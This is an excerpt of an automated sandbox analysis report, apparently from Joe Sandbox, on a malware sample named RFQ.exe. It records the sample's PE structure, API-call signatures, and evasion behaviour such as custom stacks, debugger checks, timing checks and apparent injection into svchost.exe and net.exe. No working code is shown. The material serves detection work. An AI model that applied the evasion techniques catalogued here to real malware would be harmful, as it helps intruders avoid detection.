                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aSgPuBFuPS.exe, 00000002.00000000.1724430946.000000000098E000.00000002.00000001.01000000.00000004.sdmp, aSgPuBFuPS.exe, 00000005.00000000.1886858443.000000000098E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0068615E
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A09F6 push ecx; ret 0_2_006A0A09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A1ACE push eax; iretd 1_2_003A1B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A61DF push FFFFFF9Bh; retf 1_2_003A61E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003AAA1D push edi; retf 1_2_003AAA23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B933F push ss; ret 1_2_003B9355
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A1B40 push eax; iretd 1_2_003A1B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A4BB6 push ds; iretd 1_2_003A4BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A5BF7 push FFFFFFE2h; iretd 1_2_003A5BFD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003A3420 push eax; ret 1_2_003A3422
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B3CE3 push es; retf 1_2_003B3D12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003AAF60 push 0000007Bh; iretd 1_2_003AAF62
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B8F53 push esp; ret 1_2_003B9157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310225F pushad ; ret 1_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031027FA pushad ; ret 1_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx1_2_031309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310283D push eax; iretd 1_2_03102858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310135E push eax; iretd 1_2_03101369
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0336931E push ds; retf 2_2_03369328
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_03356238 push ds; iretd 2_2_0335623A
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_03357279 push FFFFFFE2h; iretd 2_2_0335727F
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_033702DF push esp; iretd 2_2_03370300
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0336A9C1 push ss; ret 2_2_0336A9D7
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_03357861 push FFFFFF9Bh; retf 2_2_03357863
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0335C09F push edi; retf 2_2_0335C0A5
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0335C5E2 push 0000007Bh; iretd 2_2_0335C5E4
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0336A5D5 push esp; ret 2_2_0336A7D9
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0347225F pushad ; ret 3_2_034727F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034727FA pushad ; ret 3_2_034727F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034A09AD push ecx; mov dword ptr [esp], ecx3_2_034A09B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0347283D push eax; iretd 3_2_03472858
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0347135E push eax; iretd 3_2_03471369
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0069EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,0_2_0069EFAD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00711B74 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00711B74
                Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\RFQ.exeAPI/Special instruction interceptor: Address: 171833C
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B8F53 rdtsc 1_2_003B8F53
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 379Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 9593Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeAPI coverage: 4.0 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 7864Thread sleep count: 379 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7864Thread sleep time: -758000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7864Thread sleep count: 9593 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7864Thread sleep time: -19186000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe TID: 7912Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe TID: 7912Thread sleep time: -43500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F680C FindFirstFileW,FindClose,0_2_006F680C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_006F68AD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006ECF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006ECF94
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006ED2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006ED2C7
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006F9560
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006F96BB
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_006F9A49
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006EDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_006EDADC
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F5BB5 FindFirstFileW,FindNextFileW,FindClose,0_2_006F5BB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B0C820 FindFirstFileW,FindNextFileW,FindClose,3_2_00B0C820
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0068615E
                Source: aSgPuBFuPS.exe, 00000005.00000002.3506650265.0000000001570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                Source: net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                Source: firefox.exe, 00000008.00000002.2107862956.000001E9D145C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B8F53 rdtsc 1_2_003B8F53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003B7B93 LdrLoadDll,1_2_003B7B93
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FE9C9 BlockInput,0_2_006FE9C9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_0068445D
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0068615E
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006A4C78 mov eax, dword ptr fs:[00000030h]0_2_006A4C78
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_017185A8 mov eax, dword ptr fs:[00000030h]0_2_017185A8
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_01718608 mov eax, dword ptr fs:[00000030h]0_2_01718608
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_01716F48 mov eax, dword ptr fs:[00000030h]0_2_01716F48
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]1_2_0312C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h]1_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]1_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]1_2_03150310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]1_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]1_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]1_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]1_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h]1_2_031D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]1_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]1_2_031D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320634F mov eax, dword ptr fs:[00000030h]1_2_0320634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]1_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h]1_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]1_2_031EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]1_2_031B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]1_2_031663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]1_2_0312823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]1_2_0312A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]1_2_03136259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]1_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]1_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
